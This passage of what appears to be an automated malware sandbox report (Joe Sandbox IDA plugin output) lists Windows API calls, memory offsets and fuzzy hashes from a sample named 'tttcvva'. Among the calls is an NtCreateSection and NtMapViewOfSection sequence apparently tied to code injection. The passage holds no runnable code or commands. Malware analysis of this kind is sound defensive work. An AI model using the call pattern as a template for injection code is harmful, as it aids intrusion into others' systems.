                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                        APIs
                                        • LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417344), ref: 00416CD8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd
                                        Similarity
                                        • API ID: AllocLocal
                                        • String ID:
                                        • API String ID: 3494564517-0
                                        • Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                        • Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
                                        • Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                        • Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10
                                        APIs
                                        • BuildCommDCBA.KERNEL32(00000000,?), ref: 00416F01
                                        • WritePrivateProfileStringW.KERNEL32(00419450,004193D0,00419394,00419340), ref: 00416F25
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00416F2D
                                        • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00416F6D
                                        • GetComputerNameW.KERNEL32(?,?), ref: 00416F81
                                        • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416F8F
                                        • OpenJobObjectA.KERNEL32(00000000,00000000,004194A0), ref: 00416F9E
                                        • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00416FAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                        • String ID: -
                                        • API String ID: 113859268-2547889144
                                        • Opcode ID: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
                                        • Instruction ID: 8f7d67f1928f44ffaa59fc403b52841f5e51a7ccc1cf3445b47acfe1213c342b
                                        • Opcode Fuzzy Hash: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
                                        • Instruction Fuzzy Hash: DA21DB31A4434CABD7109FA4DC49BD97B74EB0C711F1241A9F749AA1C0CAB459C9CB5D
                                        APIs
                                        • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417024
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041703F
                                        • HeapDestroy.KERNEL32(00000000), ref: 0041705E
                                        • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041706D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd
                                        Similarity
                                        • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                        • String ID:
                                        • API String ID: 4159173863-0
                                        • Opcode ID: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
                                        • Instruction ID: 368a894d8ff72c9ccf33279a8f005ab713ac243706c75ee28622bc71169ac13e
                                        • Opcode Fuzzy Hash: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
                                        • Instruction Fuzzy Hash: CA01D4B5A403089BD720EB64EC45BEA3BB8EB0C742F40002AE709A7281DF746984CF59